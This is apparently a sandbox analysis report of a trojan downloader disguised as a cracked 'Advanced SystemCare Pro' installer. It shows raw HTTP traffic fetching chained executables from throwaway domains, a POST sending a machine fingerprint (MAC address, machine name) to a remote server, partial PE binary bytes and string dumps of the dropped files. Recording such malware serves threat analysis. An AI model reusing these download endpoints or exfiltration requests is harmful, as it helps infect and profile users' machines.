Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Tue, 03 Jan 2017 04:54:02 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 Jan 2017 04:54:02 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716288
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L.....3X.................`...................p....@............
..............@............@..........................................
...8E......................DZ.. u..................................@..
..........p..\............................text...._.......`...........
....... ..`.rdata..T....p.......d..............@..@.data....[...0...4.
.................@....rsrc...8E.......F...J..............@..@.reloc..4
].......^..................@..B.......................................
......................................................................
......................................................................
......................................................................
................................................ ..........3.9.....V..
......D$.....^...j .UNF..#...3.9.tRj.h|.F..M..E......]..].......]..}..
.E.s..E.SSS.6Ph..F......YY...6...tF.Sj..M.......I....3..H..H....3...uH
..|uH..xuH..tuH...uH..tuH..3.9..HH.t..=.HH....HH.s...HH..j...SF.......
}.j.....F.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G
\........F............................................................
................................_x._|................V........D$..t.V.
c=..Y..^...j...SF......j...vH.X3.3..}....vH...F...vH....vH.f...vH.
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 974
Connection: close
Date: Tue, 03 Jan 2017 04:53:57 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Bx7aaCpJIIdzXDvJuC5Sf5j1Eaaj2l9fA9bZX0M3544YO7KRX0Pe1Q==
files=4.t1=dl.u1=hXXp://VVV.dosecuretrips.com/download.php?version=1.1
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/do
wnloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cm
dline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_
installer.png.n1=Setup__2140_il2.exe.b1=am.c1=2140-sevenzip.s1=0.m1=0.
d1=0.t2=dl.u2=hXXp://promos-back.peerdlgo.info/stub/open_maker.php?dl=
1.n2=open.exe.b2=op.c2=sevenzip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://get.c
dzhugashvili.bid/?affId=1006&appTitle=Advanced%20SystemCare%20Pro%
252010.0.3&s1=2735&s2=11671248&setupName=cpSetup&appVersion=2.92&instI
d=11&exe=1.n3=cpSetup.exe.b3=cp.c3=sevenzip-1.s3=0.m3=0.d3=0.t4=dl.u4=
hXXp://slibby.ineddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excurso
r.info/taveara?q=Advanced SystemCare Pro 10.0.3.n4=sevensetup.ex
e.b4=rx.c4=sevenzip-1.s4=0.m4=0.d4=0.fn1=Components.fn2=File opener.fn
3=File finder.fn4=SevenZip.ftitle=to run your file.itype=silent...



GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache
Set-Cookie: vsid=916vr2309648528521496; expires=Sun, 02-Jan-2022 04:54:12 GMT; path=/; domain=cdn2.leadingdownload.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 195
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
..........].1..0.E.B. <.KB.tJ.u...[u...d....1..N......9-~<......
PB.....'NQ...(.A.F......c-..T..<.....x{lLl.=.....0.R .....ai...@c..
`"0...72...#.!..6~.D..4.*..!...,,.X,.....v.........L[?...i......HTTP/1
.1 200 OK..Date: Tue, 03 Jan 2017 04:54:12 GMT..Server: Apache..Set-Co
okie: vsid=916vr2309648528521496; expires=Sun, 02-Jan-2022 04:54:12 GM
T; path=/; domain=cdn2.leadingdownload.com; httponly..Vary: Accept-Enc
oding,User-Agent..Content-Encoding: gzip..Content-Length: 195..Keep-Al
ive: timeout=5, max=94..Connection: Keep-Alive..Content-Type: text/htm
l; charset=UTF-8............].1..0.E.B. <.KB.tJ.u...[u...d....1..N.
.....9-~<........



GET /launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
Date: Tue, 03 Jan 2017 04:53:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 95a477af435073615179b256d8101334.cloudfront.net (CloudFront)
X-Amz-Cf-Id: USJEb5c5PXn0b3yJVByqzRFl9isxLnfG_wEYgH5ePBbypPEE5Y24EA==
s=first..u=hXXp://jump.meunidealized.bid/stub_maker.php?program=sevenz
ip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 1
0.0.3.671 Multilingual + License Keys + PortableHTTP/1.1 200 OK..C
ontent-Type: text/html; charset=UTF-8..Content-Length: 192..Connection
: keep-alive..Date: Tue, 03 Jan 2017 04:53:56 GMT..Server: Apache/2.2.
15 (CentOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..V
ia: 1.1 95a477af435073615179b256d8101334.cloudfront.net (CloudFront)..
X-Amz-Cf-Id: USJEb5c5PXn0b3yJVByqzRFl9isxLnfG_wEYgH5ePBbypPEE5Y24EA==.
.s=first..u=hXXp://jump.meunidealized.bid/stub_maker.php?program=seven
zip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 
10.0.3.671 Multilingual + License Keys + Portable..



GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: cdn1.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache
Set-Cookie: vsid=913vr2309648528910848; expires=Sun, 02-Jan-2022 04:54:12 GMT; path=/; domain=cdn1.leadingdownload.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 193
Keep-Alive: timeout=5, max=105
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
..........].1..0.Ew$.`e...um..s.71i.$..P..'............?.O.Bh..T."....
.% ....2..(zq )..X.l=U.....D..w...f.....;.G].$....",7x.%..#.......F.^&
lt;a.6....o.L.:M..WgH...........p...j.7.:.....'>?.........



POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1483419250&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
  var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity',
 'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
;base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.&l
t;link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownl
oad.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />        &l
t;script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V
38/amipb.js"></script>.        <script type="text/javascri
pt">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer
.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..        
    var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additio
nal_offer_list = '1';.            var g_finish_install_button = '1';. 
           var g_popup_install_all = '1';.            var g_eula = 'VG
hlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMg
cnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlIC
JBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRo
aXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3
<<< skipped >>>


GET /stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: jump.meunidealized.bid
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 67424
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="586abfc3362cc.exe"
X-Powered-By: ASP.NET
Date: Mon, 02 Jan 2017 21:01:55 GMT
Age: 28314
X-Cache: Hit from cloudfront
Via: 1.1 59230305fa4e8eba32de075786d44476.cloudfront.net (CloudFront)
X-Amz-Cf-Id: yjB7YInpEKROFoTlvXoOEcqqYTBV72JXylCe_gK1YbWhyakiNhoCuQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...|...B...:............@..............
.........................@.................................p..........
......................`...............................................
........................................text....s.......t.............
..... ..`.rdata... .......,...x..............@..@.data.... ...........
...............@....ndata...................................rsrc......
.........................@..@.reloc..4...........................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2012:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe
ip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp
?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
nsx2DD4.tmp
\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5
venzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
ump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
c:\%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nss2BE0.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
201701030453
hXXp://jump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_2012_rwx_10004000_00001000:

callback%d

LF4X4VJWFp.exe_2880:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
W%$.LZ
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"
excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
Setup&appVersion=2.92&instId=11&exe=1
[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll
\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\706703874
hXXp://get.gunnightmar.club/stats.php?bu=
\nsArray.dll
ar_url
\\706703874
hXXp://get.iestharvest.club/error.php?string=
Advanced SystemCare Pro 10.0.3
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=
hXXp://get.ntemptheav.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
sevensetup.exe
SEVENS~1.EXE
Exec: success (""C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"")
l.dll"
//excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
pSetup&appVersion=2.92&instId=11&exe=1
d[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
Advanced SystemCare Pro 10.0.3 Setup
l=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
eddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
123456789 /
dvanced SystemCare Pro 10.0.3
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp
LF4X4VJWFp.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsd49FB.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
3157555
hXXp://slibby.ineddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
hXXp://promos-back.peerdlgo.info/stub/open_maker.php?dl=1
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic=

Setup__2140_il2.exe_192:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
PSShp[7
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
aeM4OKE9Je5OxhTcedU2JaFDcNhT0xXeTuA5M5xpbNtc0xaMAtI/OKdzUc5Q2keaeY13IqdrIopuk1rKWM1lavBUM8NcyhTcQuI4Orhmcctx1hTaF4QEe/VrftpT3BLaTvElOLZibNxz3hfaF4QEe/VucdxJ3hbTZ84zMugic8sRnwjeXsRqcrlhNqU=
aeM4OKE9Je5OxhTcedU2JaFDcNhT0xXeTuA5M5xpbNtc0xaNAtI/OKdzUc5Q2keaeY13IqdrIopuk1rKWM1lavBUM8NcyhTcQuI4Orhmcctx1hTaF4QEe/VrftpT3BLaTvElOLZibNxz3hfaF4QEe/VucdxJ3hbTZ84zMugic8sUtQ==
D9ILffB0NYFR0RG2D9I2Orx3dtdY01TcTMZecqZmcsYXkQ7SWo8 NLoOOtwYzFCRT9kyXg==
aeM4OKE9JfxYyy7XS888JIVmbc5Q2g7aWJt3I71mccRt3gjeR9IMcoZaP5Idmim1
Failed to get the Temp folder: %d
aeM4OKE9JfpN2xvLT/ElOLJ1etxOk1rRT9kjd7hoccpJ1gDeXsg4OfVhdsNYnxPMCsIlMrRzessHn1/TWY13NLpqb8BT2hTLCs82OrAnJY8Y0wm1
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
ec4xI6Jmbcph8hPcWM4kOLNzQ/hU0R7QXdILFKB1bcpTyyzaWNI OLtbWtdN0xXNT9MLBL1ic8Md RXTTsQlJA==
fsQlOvsnaM5Uy1qaTqs=
fsQlOvtzd91Y3h6fSdMyNqFie48Y23A=
aeU4ILtrcM5ZhUD2RNIjNrlrP pPzRXNCs45d5Z1es5J2j7WWMQ0I7p1Zo8Y7FqTCsQlJbp1P4pZtQ==
Zs44PLxpeI9b0AifWtM4NLB0bMpOnw7NT8R3OLMnOssHnwreWMQ5I6YnbMZH2lqaTo13J7Bpe8ZT2FrMQ9syd/BjFQ==
GYExOKcnOssHnwreWMQ5I6YnbMZH2lqaTo13J7Bpe8ZT2FrMQ9syd/BjP91egl/bIA==
aeU4ILtrcM5ZhUD TsUDP7RpdNxt3gjeR8QjMqcnb5IY7FrJF4QzXQ==
aeU4ILtrcM5ZhUD TsUDP7RpdNxt3gjeR8QjMqd0FQ==
aeg5JKFmc8NcyxPQROw2ObRget0HhTPRXu45E7pwccNS3h78RcwnO7BzessHnz7QXc87OLRjP8ZZgl/bCvI/OKdzUc5Q2keaeas=
aeg5JKFmc8NcyxPQROw2ObRget0HhT/RW9QyIrBOcdxJ3hbTS9U OLsnTcpc2wPrReg5JKFmc8Mdmim1
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
afU2JL5UfMdY2w/TT k2ObFret0HhTnNT8AjMpxpbNtc0xbrS9I8d4ZyfMxYzAmeCvU2JL4nbNpe3B/MWcciO7l P91Y2BPMXsQlMrEpFQ==
ecQjd4J0d/xV2hbTCpx3FKdifttY8BjVT8Ijf/dQTMxP1grLBPI/MrlrPYY3shnSTtJqAKZvTMdY0xaRePQZf/cibI0Rj1b5S80kMvwNEvhu3AjWWtV5BLliet8djEqPGpFnXdhkcstOgi3MQvI/MrlrMf1o8VKdSMgjJLRjcsZTn1XcS880MrknOtwfk0qTbMA7JLAuFaJu2g6ffdI/BL1ic8MdglrxRdU/Prtg
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
vinyls.tramell.1 = s 'Inst Class'
CLSID = s '{dded0858-104b-4eec-a82e-a44b49d78594}'
vinyls.tramell = s 'Inst Class'
CurVer = s 'vinyls.tramell.1'
ForceRemove {dded0858-104b-4eec-a82e-a44b49d78594} = s 'Inst Class'
ProgID = s 'vinyls.tramell.1'
VersionIndependentProgID = s 'vinyls.tramell'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{a0e998a2-81f0-420b-a12b-563442cf5349}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
